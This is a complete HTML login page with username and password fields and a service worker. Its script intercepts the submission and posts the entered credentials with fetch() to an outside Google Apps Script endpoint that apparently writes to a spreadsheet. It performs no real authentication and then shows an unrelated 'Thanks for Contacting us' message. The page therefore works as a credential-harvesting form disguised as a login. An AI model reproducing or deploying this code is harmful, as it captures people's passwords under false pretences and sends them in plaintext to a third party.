<!DOCTYPE html>
<html>
<head>
    <title>Login here</title>
    <link rel="shortcut icon" href="CD.png" type="image/x-icon">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="manifest" href="manifest.json">
    <link rel="stylesheet" href="style2.css">
    <style>
        body {
            margin: 0;
            padding: 0;
        }

        .loginpage {
            background: #434343be;
            height: 350px;
            width: 250px;
            justify-content: center;
            border-radius: 8px;
            align-content: center;
            place-items: center;
            position: absolute;
            right: 10px;
            top: 70px;
            padding: 10px;
        }

        .loginbtn {
            background: blue;
            width: 100%;
            height: 30px;
            border-radius: 8px;
            color: white;
        }

        .input {
            background: transparent;
            border-radius: 8px;
            border: none;
            border-bottom: 2px solid blue;
            height: 25px;
            width: 95%;
            padding: 6px;
            font-size: 20px;
        }

        label {
            font-size: 20px;
            color: blue;
            margin-left: 10px;
        }

        .input:focus {
            outline: none;
        }

    </style>
</head>
<body>
    <div class="loginpage">
        <h1 style="color:red">Login Here!</h1>
        <form method="post" name="google-sheet">
            <label for="username">Username:</label>
            <input type="text" id="username" name="Username" required class="input"><br><br>

            <label for="password">Password:</label>
            <input type="password" id="password" name="Password" required class="input"><br><br>
        
            <input type="submit" value="Login" name="submit" class="loginbtn">
        </form>
    </div>
    <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbzvRveS0ExA01a-MxY2iSEad-eEr-KV-UCWI-3NN1aU59QC9of0KbNabtHtFX4n7MZj/exec';
        const form = document.forms['google-sheet'];

        form.addEventListener('submit', e => {
            e.preventDefault();
            fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                .then(response => alert("Thanks for Contacting us..! We Will Contact You Soon..."))
                .catch(error => console.error('Error!', error.message));
        });
    </script>
    <script>
        if ('serviceWorker' in navigator) {
            window.addEventListener('load', () => {
                navigator.serviceWorker.register('service-worker.js')
                    .then(registration => {
                        console.log('Service Worker registered with scope:', registration.scope);
                    })
                    .catch(err => {
                        console.error('Service Worker registration failed:', err);
                    });
            });
        }
    </script>
</body>
</html>
